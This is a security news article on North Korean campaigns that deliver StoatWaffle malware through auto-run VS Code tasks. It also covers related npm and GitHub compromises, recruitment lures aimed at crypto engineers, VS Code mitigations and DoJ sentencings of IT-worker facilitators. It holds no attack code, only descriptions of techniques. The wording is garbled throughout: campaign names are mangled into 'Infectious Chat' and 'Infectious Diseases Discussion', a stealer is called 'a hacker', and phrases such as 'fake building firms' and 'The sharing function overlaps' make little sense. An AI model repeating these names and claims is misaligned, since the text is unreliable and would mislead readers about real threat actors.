North Korean Hackers Exploit VS Code Auto-Run Tasks to Deploy StoatWaffle Malware

The North Korean threat actors behind the Contagious Interview campaign, also known as WaterPlum, are said to be related to a malware family known as. StoatWaffle distributed by malicious Microsoft Visual Studio Code (VS Code) projects.

The use of VS Code “tasks.json” to distribute malware is a relatively new technique used by a threat actor since December 2025, with the attack using the “runOn:folderOpen” option to automatically start its execution every time any file in the project folder is opened in VS Code.

“This function is configured to download data from a web application in Vercel regardless of the OS you are using. [operating system],” said NTT Security in a report published last week. “Although we assume that the operating system is Windows in this article, the basic behavior is the same for any OS.”

The downloaded payload first checks if Node.js is installed on the workstation. If not, the malware downloads Node.js from the official website and installs it. Next, it continues to launch the downloader, which often polls the external server to download the next-stage downloader that shows the same behavior by accessing another endpoint on the same server and using the response received as Node.js code.

StoatWaffle has been found to deliver two different modules –

• A hacker that captures information and extension data stored in web browsers (Chromium and Mozilla Firefox-based browsers) and uploads them to a command and control (C2) server. If the compromised program runs on macOS, it also steals the iCloud Keychain database.
• A remote access trojan (RAT) that communicates with the C2 server to download and execute commands on the infected host. Commands allow the malware to change the current working directory, enumerate files and directories, execute Node.js code, upload a file, repeatedly search a given directory and list or load files matching a specific keyword, execute shell commands, and terminate itself.

“StoatWaffle is a malware that uses Node.js, and has Stealer and RAT modules,” the Japanese security vendor said. “WaterPlum continues to develop new malware and update existing ones.”

This development coincides with various campaigns launched by a threat actor targeting the open ecosystem –

• A set of malicious npm packages distributed the PylangGhost malware, marking the first time that malware was distributed via npm packages.
• A campaign known as PolinRider has installed a malicious JavaScript payload on hundreds of public GitHub repositories culminating in the use of a new version of BeaverTail, a known hacker and downloader of malware caused by Infectious Chat.
• Among the compromises are four repositories of the Neutralinojs GitHub organization. The attack allegedly compromised the GitHub account of long-time contributor neutralinojs with corporate-level write access to execute JavaScript code that returns encrypted payloads to Tron, Aptos, and the Binance Smart Chain (BSC) to download and run BeaverTail. Victims are believed to have been infected with a malicious VS Code extension or npm package.

Microsoft, in an Infectious Diseases Discussion analysis this month, said that threat actors gain initial access to developer systems through “persuasive recruitment processes” that mimic legitimate technical discussions, eventually persuading victims to run malicious commands or packages hosted on GitHub, GitLab, or Bitbucket as part of an experiment.

In some cases, the target is approached on LinkedIn. However, the people chosen for this social engineering attack are not junior engineers, but rather founders, CTOs, and senior engineers in the field of cryptocurrency or Web3, who may have high access to the company’s technical infrastructure and cryptocurrency wallets. A recent incident involved attackers successfully impersonating the founder of AllSecure.io through a fake interview.

Some of the key malware families used as part of these attack chains include OtterCookie (a backdoor capable of stealing large amounts of data), InvisibleFerret (a Python-based backdoor), and FlexibleFerret (a modular backdoor implemented in Go and Python). Although InvisibleFerret is known to be usually delivered via BeaverTail, recent hackers have been found to distribute the malware as a payload, after initial access was found via OtterCookie.

It is worth mentioning here that FlexibleFerret is also called WeaselStore. Its Go and Python versions go by the monikers GolangGhost and PylangGhost, respectively.

In a sign that threat actors are fully refining their commercial work, a new version of VS Code projects has bypassed the Vercel-based domains of the GitHub Gist-hosted documents to download and release the payload of the next phase that ultimately leads to the use of FlexibleFerret. These VS Code projects are hosted on GitHub.

“By embedding targeted malware delivery directly into interview tools, coding tests, and testing workflows that developers naturally trust, threat actors are exploiting job seekers they place in the hiring process during periods of high motivation and time pressure, reducing suspicion and resistance,” the tech giant said.

In response to the ongoing exploitation of VS Code Tasks, Microsoft included a mitigation in the January 2026 update (version 1.109) that introduces a new “task.allowAutomaticTasks” setting, which is toggled to “off” to improve security and prevent unintended execution of tasks defined in “tasks.json” when opening a workspace.

“The update also prevents the setting from being defined at the workspace level, so malicious repositories with their own .vscode/settings.json file should not be able to override a user’s (global) setting,” Abstract Security said.

“This version and the latest February 2026 release (version 1.110) introduce a second prompt that alerts the user when an autorun task is detected in a newly opened workspace. This serves as an additional safeguard after the user accepts the Workspace Trust prompt.”

In recent months, North Korean threat actors have also been engaging in a malware campaign targeting cryptocurrency professionals through the use of LinkedIn social engineering, fake building firms, and fake video conference links. The sharing function overlaps with tracked collections such as GhostCall and UNC1069.

“The series of attacks culminates in a fake ClickFix-style CAPTCHA page that tricks victims into executing commands posted on a clipboard in their environment,” MacPaw’s Moonlock Lab said. “Campaign is cross-platform by design, delivering compatible payloads for both macOS and Windows.”

The findings come as the US Department of Justice (DoJ) announced the sentencing of three men — Audricus Phagnasay, 25, Jason Salazar, 30, and Alexander Paul Travis, 35 — for their role in running a fake North Korean personnel (IT) program that violates international sanctions. All three people previously pleaded guilty in November 2025.

Phagnasay and Salazar were both sentenced to three years of probation and fined $2,000. They were also ordered to forfeit their ill-gotten gains for participating in the wire fraud conspiracy. Travis was sentenced to one year in prison and ordered to forfeit $193,265 in proceeds from North Korean impersonations.

“These men gave the keys to the Internet empire to North Korean technology workers overseas who wanted to raise illegal money for the North Korean government — all in return for what seemed like easy money to them,” Margaret Heap, the U.S. attorney for the Southern District of Georgia, said in a statement.

Last week, Flare and IBM X-Force published a detailed look at IT staff operations and internal structure, while highlighting how IT staff study at prestigious universities in North Korea and undergo a rigorous interview process themselves before joining the program.

“They are considered special members of North Korean society and have become an important part of the strategic goals of the North Korean government,” the companies noted. “These purposes include, but are not limited to, income generation, remote employment, theft of business and proprietary information, extortion, and providing support to other North Korean groups.”